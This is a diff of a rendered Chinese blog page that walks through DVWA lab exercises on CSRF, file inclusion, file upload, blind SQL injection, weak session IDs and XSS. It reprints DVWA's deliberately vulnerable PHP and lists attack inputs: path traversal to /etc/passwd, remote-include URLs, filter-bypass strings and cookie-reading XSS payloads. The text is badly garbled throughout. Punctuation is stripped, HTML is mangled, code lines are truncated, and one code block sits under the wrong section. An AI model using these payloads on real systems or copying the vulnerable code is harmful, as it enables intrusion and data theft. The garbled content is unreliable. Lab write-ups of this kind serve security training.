@ -87,7 +87,7 @@
< meta property = "og:site_name" content = "混元霹雳手" > < meta property = "og:site_name" content = "混元霹雳手" >
< meta property = "og:description" content = "搭建环境最好使用docker来搭建, , , ( ) , > < meta property = "og:description" content = "搭建环境最好使用docker来搭建, , , ( ) , >
< meta property = "og:locale" content = "zh-Hans" > < meta property = "og:locale" content = "zh-Hans" >
< meta property = "og:updated_time" content = "2019-07-24T0 3:48:23.821 Z"> < meta property = "og:updated_time" content = "2019-07-24T0 6:00:56.862 Z">
< meta name = "twitter:card" content = "summary" > < meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "DVWA黑客攻防平台" > < meta name = "twitter:title" content = "DVWA黑客攻防平台" >
< meta name = "twitter:description" content = "搭建环境最好使用docker来搭建, , , ( ) , > < meta name = "twitter:description" content = "搭建环境最好使用docker来搭建, , , ( ) , >
@ -481,18 +481,14 @@
< h2 id = "medium模式-2" > < a href = "#medium模式-2" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 检查 HTTP_REFERER( , ) ( , , ) < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Checks to see where the request came from< / span > < br > < span class = "line" > if( stripos( $_SERVER[ ' HTTP_REFERER' ] ,$_SERVER[ ' SERVER_NAME' ]) !== false ) { < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h2 id = "medium模式-2" > < a href = "#medium模式-2" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 检查 HTTP_REFERER( , ) ( , , ) < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Checks to see where the request came from< / span > < br > < span class = "line" > if( stripos( $_SERVER[ ' HTTP_REFERER' ] ,$_SERVER[ ' SERVER_NAME' ]) !== false ) { < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 想要通过验证, < br > 我们这需要把上面的攻击页面名字改成包含host就可以了。(把攻击页面放在服务器上)< / p > < p > 想要通过验证, < br > 我们这需要把上面的攻击页面名字改成包含host就可以了。(把攻击页面放在服务器上)< / p >
< h1 id = "文件包含" > < a href = "#文件包含" class = "headerlink" title = "文件包含" > < / a > 文件包含< / h1 > < h2 id = "easy模式-3" > < a href = "#easy模式-3" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < p > 某些Web应用程序允许用户指定直接用于文件流的输入, , , < br > 如果选择要包含的文件在目标计算机上是本地的, ( ) , ( ) < br > 当RFI不是一种选择时。使用LFI的另一个漏洞( ) < br > 注意,术语“文件包含”与“任意文件访问”或“文件公开”不同。< br > 只使用文件包含来阅读’../hackable/flags/fi.php’ < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // The page we wish to display< / span > < br > < span class = "line" > $file = $_GET[ ' page' ];< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h1 id = "文件包含" > < a href = "#文件包含" class = "headerlink" title = "文件包含" > < / a > 文件包含< / h1 > < h2 id = "easy模式-3" > < a href = "#easy模式-3" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < p > 某些Web应用程序允许用户指定直接用于文件流的输入, , , < br > 如果选择要包含的文件在目标计算机上是本地的, ( ) , ( ) < br > 当RFI不是一种选择时。使用LFI的另一个漏洞( ) < br > 注意,术语“文件包含”与“任意文件访问”或“文件公开”不同。< br > 只使用文件包含来阅读’../hackable/flags/fi.php’ < br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // The page we wish to display< / span > < br > < span class = "line" > $file = $_GET[ ' page' ];< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 文件包含漏洞的一般特征如下:< / p > < p > 文件包含漏洞的一般特征如下:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ?page=a.php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?home=a.html< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?file=content< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > ?page=a.php< / p > < p > 几种经典的测试方法:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ?file=../../../../../etc/passwdd< / span > < br > < span class = "line" > ?page=file:///etc/passwd< / span > < br > < span class = "line" > ?home=main.cgi< / span > < br > < span class = "line" > ?page=http://www.a.com/1.php< / span > < br > < span class = "line" > =http://1.1.1.1/../../../../dir/file.txt< / span > < br > < span class = "line" > (通过多个../可以让目录回到根目录中然后再进入目标目录)< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > ?home=a.html< / p >
< p > ?file=content< / p >
< p > 几种经典的测试方法:< / p >
< p > ?file=../../../../../etc/passwdd< br > ?page=file:///etc/passwd< br > ?home=main.cgi< br > ?page=< a href = "http://www.a.com/1.php" target = "_blank" rel = "noopener" > http://www.a.com/1.php< / a > < br > =< a href = "http://1.1.1.1/../../../../dir/file.txt" target = "_blank" rel = "noopener" > http://1.1.1.1/../../../../dir/file.txt< / a > < br > (通过多个../可以让目录回到根目录中然后再进入目标目录)< / p >
< h2 id = "medium模式-3" > < a href = "#medium模式-3" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 增加对绝对路径http和相对路径的检查< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Input validation< / span > < br > < span class = "line" > $file = str_replace( array( " http://" , " https://" ), " " , $file );< / span > < br > < span class = "line" > $file = str_replace( array( " ../" , " ..\" " ), " " , $file );< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h2 id = "medium模式-3" > < a href = "#medium模式-3" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 增加对绝对路径http和相对路径的检查< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Input validation< / span > < br > < span class = "line" > $file = str_replace( array( " http://" , " https://" ), " " , $file );< / span > < br > < span class = "line" > $file = str_replace( array( " ../" , " ..\" " ), " " , $file );< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 但依然可以使用?page=file:///etc/passwd< br > 以及重复字符过滤方法,构造url< / p > < p > 但依然可以使用?page=file:///etc/passwd< br > 以及重复字符过滤方法,构造url< / p >
< ol > < ol >
< li > 构造url为httphttp:// – > http< / li > < li > 构造url为 httphttp:// – > http< / li >
< li > 构造url为httphttp://:// – > http://< / li > < li > 构造url为 httphttp://:// – > http://< / li >
< li > 构造url为…/./ – > ../< / li > < li > 构造url为 …/./ – > ../< / li >
< / ol > < / ol >
< h1 id = "文件上传" > < a href = "#文件上传" class = "headerlink" title = "文件上传" > < / a > 文件上传< / h1 > < h2 id = "easy模式-4" > < a href = "#easy模式-4" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote > < h1 id = "文件上传" > < a href = "#文件上传" class = "headerlink" title = "文件上传" > < / a > 文件上传< / h1 > < h2 id = "easy模式-4" > < a href = "#easy模式-4" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > 上传的文件对Web应用程序构成重大风险。许多攻击的第一步是将一些代码提供给系统进行攻击。然后攻击者只需要找到一种方法来执行代码。使用文件上传有助于攻击者完成第一步。< br > 不受限制的文件上载的后果可能会有所不同,包括完整的系统接管,过载的文件系统,向后端系统转发攻击以及简单的污损。这取决于应用程序对上传文件的作用,包括存储位置。< br > 由于此文件上载漏洞, ( ( ) ( ) ) < / p > < p > 上传的文件对Web应用程序构成重大风险。许多攻击的第一步是将一些代码提供给系统进行攻击。然后攻击者只需要找到一种方法来执行代码。使用文件上传有助于攻击者完成第一步。< br > 不受限制的文件上载的后果可能会有所不同,包括完整的系统接管,过载的文件系统,向后端系统转发攻击以及简单的污损。这取决于应用程序对上传文件的作用,包括存储位置。< br > 由于此文件上载漏洞, ( ( ) ( ) ) < / p >
@ -513,11 +509,11 @@
< h1 id = "SQL盲注" > < a href = "#SQL盲注" class = "headerlink" title = "SQL盲注" > < / a > SQL盲注< / h1 > < blockquote > < h1 id = "SQL盲注" > < a href = "#SQL盲注" class = "headerlink" title = "SQL盲注" > < / a > SQL盲注< / h1 > < blockquote >
< p > 盲注, , , , , < br > 1.判断是否存在注入,注入是字符型还是数字型< br > 2.猜解当前数据库名< br > 3.猜解数据库中的表名< br > 4.猜解表中的字段名< br > 5.猜解数据< / p > < p > 盲注, , , , , < br > 1.判断是否存在注入,注入是字符型还是数字型< br > 2.猜解当前数据库名< br > 3.猜解数据库中的表名< br > 4.猜解表中的字段名< br > 5.猜解数据< / p >
< / blockquote > < / blockquote >
< figure class = "highlight p lain "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if( isset( $_GET[ ' Submit' ] ) ) { < / span > < br > < span class = "line" > // Get input< / span > < br > < span class = "line" > $id = $_GET[ ' id' < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Check database< / span > < br > < span class = "line" > $getid = " SELECT first_name, last_name FROM users WHERE user_id = ' $id' ;" < / span > < br > < span class = "line" > $result = mysqli_query($GLOBALS[" ___mysqli_ston" ], $getid ); // Removed ' or die' < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Get results< / span > < br > < span class = "line" > $num = @mysqli_num_rows( $result ); // The ' @' character suppresses errors< / span > < br > < span class = "line" > if( $num > 0 ) { < / span > < br > < span class = "line" > // Feedback for end user< / span > < br > < span class = "line" > echo ' < pre> User ID exists in the database.< /pre> ' ;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > else { < / span > < br > < span class = "line" > // User wasn' t found, so the page wasn' t! < / span > < br > < span class = "line" > header( $_SERVER[ ' SERVER_PROTOCOL' ] . ' 404 Not Found' < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Feedback for end user< / span > < br > < span class = "line" > echo ' < pre> User ID is MISSING from the database.< /pre> ' < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ((is_null($___mysqli_res = mysqli_close($GLOBALS[" ___mysqli_ston" ]))) ? false< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < figure class = "highlight p hp "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > ( < span class = "keyword" > isset< / span > ( $_GET[ < span class = "string" > 'Submit'< / span > { < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $id = $_GET[ < span class = "string" > 'id'< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $getid = < span class = "string" > "SELECT first_name, last_name FROM users WHERE user_id = '$id';"< / span > < / span > < br > < span class = "line" > $result = mysqli_query($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ], $getid ); < span class = "comment" > // Removed 'or die'< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > $num = @mysqli_num_rows( $result ); < span class = "comment" > // The '@'< / span > < / span > < br > < span class = "line" > < span class = "keyword" > < / span > > < span class = "number" > < / span > { < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > < span class = "keyword" > echo< / span > < span class = "string" > '< pre> User ID exists in the database.< /pre> '< / span > < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < span class = "keyword" > < / span > { < / span > < br > < span class = "line" > < span class = "comment" > // User wasn't found, so the page wasn't!< / span > < / span > < br > < span class = "line" > header( $_SERVER[ < span class = "string" > 'SERVER_PROTOCOL'< / span > ] . < span class = "string" > ' 404 Not Found'< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > < / span > < / span > < br > < span class = "line" > < span class = "keyword" > echo< / span > < span class = "string" > '< pre> User ID is MISSING from the database.< /pre> '< / span > ;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ((is_null($___mysqli_res = mysqli_close($GLOBALS[< span class = "string" > "___mysqli_ston"< / span > ]))) ? < span class = "keyword" > false< / span > < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > > < / span > < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 查看源码发现还是没有对id做过滤, , < / p > < p > 查看源码发现还是没有对id做过滤, , < / p >
< p > 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。< br > 如果手工盲注的话, : < br > < a href = "https://www.freebuf.com/articles/web/120985.html" target = "_blank" rel = "noopener" > https://www.freebuf.com/articles/web/120985.html< / a > < br > 如果自动盲注的话, , : < br > < a href = "https://www.jianshu.com/p/ec2ca79e74b2" target = "_blank" rel = "noopener" > https://www.jianshu.com/p/ec2ca79e74b2< / a > < / p > < p > 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。< br > 如果手工盲注的话, : < br > < a href = "https://www.freebuf.com/articles/web/120985.html" target = "_blank" rel = "noopener" > https://www.freebuf.com/articles/web/120985.html< / a > < br > 如果自动盲注的话, , : < br > < a href = "https://www.jianshu.com/p/ec2ca79e74b2" target = "_blank" rel = "noopener" > https://www.jianshu.com/p/ec2ca79e74b2< / a > < / p >
< h1 id = "弱session-id" > < a href = "#弱session-id" class = "headerlink" title = "弱session-id" > < / a > 弱session-id< / h1 > < h2 id = "easy模式-6" > < a href = "#easy模式-6" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < p > session-ID通常是在登录后作为特定用户访问站点所需的唯一内容, , , < / p > < h1 id = "弱session-id" > < a href = "#弱session-id" class = "headerlink" title = "弱session-id" > < / a > 弱session-id< / h1 > < h2 id = "easy模式-6" > < a href = "#easy模式-6" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < p > session-ID通常是在登录后作为特定用户访问站点所需的唯一内容, , , < / p >
< p > 根据源码可以看出来session每次加1< br > < figure class = "highlight p lain "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $html = " " < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if ($_SERVER[' REQUEST_METHOD' ] == " POST" ) { < / span > < br > < span class = "line" > if (!isset ($_SESSION[' last_session_id' ])) { < / span > < br > < span class = "line" > $_SESSION[' last_session_id' ] = 0< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > $_SESSION[' last_session_id' < / span > < br > < span class = "line" > $cookie_value = $_SESSION[' last_session_id' < / span > < br > < span class = "line" > setcookie(" dvwaSession" < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < p > 根据源码可以看出来session每次加1< br > < figure class = "highlight p hp "> < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $html = < span class = "string" > ""< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > ($_SERVER[< span class = "string" > 'REQUEST_METHOD'< / span > ] == < span class = "string" > "POST"< / span > { < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > (!< span class = "keyword" > isset< / span > ($_SESSION[< span class = "string" > 'last_session_id'< / span > { < / span > < br > < span class = "line" > $_SESSION[< span class = "string" > 'last_session_id'< / span > ] = < span class = "number" > 0< / span > < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > $_SESSION[< span class = "string" > 'last_session_id'< / span > < / span > < br > < span class = "line" > $cookie_value = $_SESSION[< span class = "string" > 'last_session_id'< / span > < / span > < br > < span class = "line" > setcookie(< span class = "string" > "dvwaSession"< / span > < / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < span class = "meta" > > < / span > < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 按f12看application-cookies也能发现这个规律。< br > 然后使用hackbar这个扩展程序攻击。< / p > < p > 按f12看application-cookies也能发现这个规律。< br > 然后使用hackbar这个扩展程序攻击。< / p >
< h2 id = "medium模式-6" > < a href = "#medium模式-6" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 从源码中可以看到dvwaSession就是时间戳< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $html = " " ;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if ($_SERVER[' REQUEST_METHOD' ] == " POST" ) { < / span > < br > < span class = "line" > $cookie_value = time();< / span > < br > < span class = "line" > setcookie(" dvwaSession" , $cookie_value);< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h2 id = "medium模式-6" > < a href = "#medium模式-6" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 从源码中可以看到dvwaSession就是时间戳< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > $html = " " ;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if ($_SERVER[' REQUEST_METHOD' ] == " POST" ) { < / span > < br > < span class = "line" > $cookie_value = time();< / span > < br > < span class = "line" > setcookie(" dvwaSession" , $cookie_value);< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< h1 id = "基于DOM的XSS" > < a href = "#基于DOM的XSS" class = "headerlink" title = "基于DOM的XSS" > < / a > 基于DOM的XSS< / h1 > < h2 id = "easy模式-7" > < a href = "#easy模式-7" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote > < h1 id = "基于DOM的XSS" > < a href = "#基于DOM的XSS" class = "headerlink" title = "基于DOM的XSS" > < / a > 基于DOM的XSS< / h1 > < h2 id = "easy模式-7" > < a href = "#easy模式-7" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
@ -537,38 +533,28 @@
< p > 绕过有两种方式< / p > < p > 绕过有两种方式< / p >
< ol > < ol >
< li > 方式1< br > url中有一个字符为#,该字符后的数据不会发送到服务器端,从而绕过服务端过滤< br > < code > http://192.168.31.84:81/vulnerabilities/xss_d/?default=English#< script> alert(document.cookie)< /script> < / code > < / li > < li > 方式1< br > url中有一个字符为#,该字符后的数据不会发送到服务器端,从而绕过服务端过滤< br > < code > http://192.168.31.84:81/vulnerabilities/xss_d/?default=English#< script> alert(document.cookie)< /script> < / code > < / li >
< li > 方法2< br > 或者就是用img标签或其他标签的特性去执行js代码, , , < br > `< a href = "http://192.168.31.84:81/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(/xss/)%3E'" target = "_blank" rel = "noopener" > http://192.168.31.84:81/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(/xss/)%3E' < / a > < / li > < li > 方法2< br > 或者就是用img标签或其他标签的特性去执行js代码, , , < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < / span > < br > < span class = "line" > # 反射型xss< / span > < br > < span class = "line" > ## easy模式< / span > < br > < span class = "line" > > 反射型( ) : , < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 查看源码,服务器直接把客户端的输入返回回来显示< / span > < br > < span class = "line" > ```php< / span > < br > < span class = "line" > < ?php< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > header (" X-XSS-Protection: 0" );< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > // Is there any input?< / span > < br > < span class = "line" > if( array_key_exists( " name" , $_GET ) & & $_GET[ ' name' ] != NULL ) { < / span > < br > < span class = "line" > // Feedback for end user< / span > < br > < span class = "line" > echo ' < pre> Hello ' . $_GET[ ' name' ] . ' < /pre> ' ;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ?> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< / li >
< / ol > < / ol >
< h1 id = "反射型xss" > < a href = "#反射型xss" class = "headerlink" title = "反射型xss" > < / a > 反射型xss< / h1 > < h2 id = "easy模式-8" > < a href = "#easy模式-8" class = "headerlink" title = "easy模式" > < / a > easy模式< / h2 > < blockquote >
< p > 反射型( ) : , < / p >
< / blockquote >
< p > 查看源码,服务器直接把客户端的输入返回回来显示< br > < figure class = "highlight php" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > < ?php< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > header (< span class = "string" > "X-XSS-Protection: 0"< / span > );< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "comment" > // Is there any input?< / span > < / span > < br > < span class = "line" > < span class = "keyword" > if< / span > ( array_key_exists( < span class = "string" > "name"< / span > , $_GET ) & & $_GET[ < span class = "string" > 'name'< / span > ] != < span class = "keyword" > NULL< / span > ) { < / span > < br > < span class = "line" > < span class = "comment" > // Feedback for end user< / span > < / span > < br > < span class = "line" > < span class = "keyword" > echo< / span > < span class = "string" > '< pre> Hello '< / span > . $_GET[ < span class = "string" > 'name'< / span > ] . < span class = "string" > '< /pre> '< / span > ;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > ?> < / span > < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > < a href = "http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E" target = "_blank" rel = "noopener" > http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E< / a > < / p > < p > < a href = "http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E" target = "_blank" rel = "noopener" > http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E< / a > < / p >
< h2 id = "medium模式-8" > < a href = "#medium模式-8" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 源码里检查了script标签< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Get input< / span > < br > < span class = "line" > $name = str_replace( ' < script> ' , ' ' , $_GET[ ' name' ] );< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p > < h2 id = "medium模式-8" > < a href = "#medium模式-8" class = "headerlink" title = "medium模式" > < / a > medium模式< / h2 > < p > 源码里检查了script标签< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > // Get input< / span > < br > < span class = "line" > $name = str_replace( ' < script> ' , ' ' , $_GET[ ' name' ] );< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
